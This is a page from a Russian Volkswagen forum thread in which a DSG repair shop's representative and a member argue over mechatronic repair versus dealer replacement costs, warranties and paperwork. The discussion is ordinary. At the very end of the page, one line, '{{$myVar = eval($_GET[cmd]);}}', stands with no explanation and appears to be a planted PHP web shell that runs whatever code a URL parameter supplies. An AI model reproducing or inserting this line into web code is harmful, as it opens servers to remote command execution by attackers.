+ Ответить в теме
Страница 3 из 7 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя
Показано с 21 по 30 из 62

Тема: DSG-Service.com - Ремонт, обслуживание и тюнинг DSG


  1. #21
    GTI-Racing egor121 is on a distinguished road Аватар для egor121
    Регистрация
    08.10.2012
    Откуда
    Москва
    Машина
    Passat cc
    Сообщений
    81
    Спасибо!!

  2. #22
    Цитата Сообщение от egor121 Посмотреть сообщение
    Добрый вечер, подскажите golf 5 gti 2007 года, dsg6 на холодную все норм, как прогреется коробка, то есть через час, два начинает толкать при трогании, на задней передачи едет рывками, как будто мало газа(волнообразно), при полной остановке иногда падают обороты как будто хочет заглохнуть( обороты падают примерно на 150~200) пробег 123000 масло меняли два раза, адаптация не помогает, ошибок по коробке нет! Что может быть сцепление, маховик или мехатрон?? Или может дилеры налили масла меньше нормы?
    Замена сцепы и ремонт мехатрона. Подробнее после диагностики. Звоните все починим.


    Цитата Сообщение от Bonder Посмотреть сообщение
    Мехатрон поменял месяца 2 назад. Встало точно в такую де сумму, сколько стоит починить Мехатрон в дсг сервисе. Я прикинул и решил взять новый. Но это через своих. Сам Мехатрон ща нормальных денег стоит
    уточню что это было до роста евро))) прайс за мехатрон вышел агонь из-за хороших знакомых в дилере? верно?))) не у всех есть такие знакомые)))
    Ремонт и обслуживание DSG!
    www.dsg-service.com

  3. #23
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    Цитата Сообщение от Sanya_S Посмотреть сообщение
    Замена сцепы и ремонт мехатрона. Подробнее после диагностики. Звоните все починим.




    уточню что это было до роста евро))) прайс за мехатрон вышел агонь из-за хороших знакомых в дилере? верно?))) не у всех есть такие знакомые)))
    Ну видимо курс евро не влияет на ценник у дилера. Один фиг лучше новый Мехатрон чем ремонтировать. Щас то курс евро не Шипко большой по отношению на состояние октября. Разница 10 рублей.

  4. #24
    Цитата Сообщение от Bonder Посмотреть сообщение
    Мехатрон поменял месяца 2 назад. Встало точно в такую де сумму, сколько стоит починить Мехатрон в дсг сервисе. Я прикинул и решил взять новый. Но это через своих. Сам Мехатрон ща нормальных денег стоит
    Цитата Сообщение от Bonder Посмотреть сообщение
    Ну видимо курс евро не влияет на ценник у дилера. Один фиг лучше новый Мехатрон чем ремонтировать. Щас то курс евро не Шипко большой по отношению на состояние октября. Разница 10 рублей.
    и почем сейчас у дилера мехатрон на гти 5?
    Последний раз редактировалось Sanya_S; 24.04.2015 в 13:10.
    Ремонт и обслуживание DSG!
    www.dsg-service.com

  5. #25
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    Цитата Сообщение от Sanya_S Посмотреть сообщение
    и почем сейчас у дилера мехатрон на гти 5?
    Ровно столько, сколько ты мне объявлял за ремонт мехатроника. Масло и работа в стоимость входят

  6. #26
    Цитата Сообщение от Bonder Посмотреть сообщение
    Ровно столько, сколько ты мне объявлял за ремонт мехатроника. Масло и работа в стоимость входят
    т.е. 45000руб с маслом и работой у дилера с гарантией?
    Ремонт и обслуживание DSG!
    www.dsg-service.com

  7. #27
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    Цитата Сообщение от Sanya_S Посмотреть сообщение
    т.е. 45000руб с маслом и работой у дилера с гарантией?
    Не совсем так. Плюс 5 за масло и фильтр. Гарантию дали, но не на бумаге. И кассовый чек тоже не дали, вы его тоже по-моему не даете)))

  8. #28
    Цитата Сообщение от Bonder Посмотреть сообщение
    Не совсем так. Плюс 5 за масло и фильтр. Гарантию дали, но не на бумаге. И кассовый чек тоже не дали, вы его тоже по-моему не даете)))
    у нас на все авто выдаются заказ-наряды. гарантия на бумаге. ну и 45000руб было объявлено за ремонт мехатрона. ты сказал что за эту сумму тебе поменяли мехатрон и залили масло. кто-то кого-то обманывает.

    как делается у дилера: 1) это только для хорошо знакомых людей и не всегда прокатывает. 2) дилер, а именно гарантийщик списывает на любую другую машину этот мехатроник и кладет к себе в карман деньги за него, потом эту самую машину при возникновении проблем у него посылают с куланцом. (как вариант). 3) при таком раскладе никаких гарантий оффициально не будет. а на словах сказать что угодно могут.)))

    ты в следующий раз уточняй, что только ИЗБРАННЫМ таким образом можно замутить мехатроник.

    Вон помоги человеку, который мучается с гти5 поменять мехатроник за 45000руб., раз это так выходит у дилера щас.
    Ремонт и обслуживание DSG!
    www.dsg-service.com

  9. #29
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    Спасибо за совет. Обратиться, может и помогу вам. Я никого не хочу обидеть, я бы мехатроник не стал менять, если бы у вас не вскрывал коробас и не убедился что диф живой и износ минимальный. А так то ты прав. Мне если честно всё равно кому деньги платить и отсутствие документов меня особо не настораживает) а мы мне заказ наряд открывали?

  10. #30
    тогда еще их небыло)))
    Ремонт и обслуживание DSG!
    www.dsg-service.com

+ Ответить в теме
Страница 3 из 7 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя

Похожие темы

  1. Ответов: 4
    Последнее сообщение: 02.04.2024, 16:43
  2. Обслуживание GTI V
    от son_in_law в разделе Golf 5
    Ответов: 5
    Последнее сообщение: 03.01.2024, 14:09
  3. Сервис и обслуживание
    от Pavel095 в разделе Курилка
    Ответов: 12
    Последнее сообщение: 28.02.2013, 18:24
  4. Сервисное обслуживание
    от Sanek59 в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 24.03.2010, 11:33
  5. Ремонт и обслуживание
    от Romaha в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 13.08.2009, 08:23

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}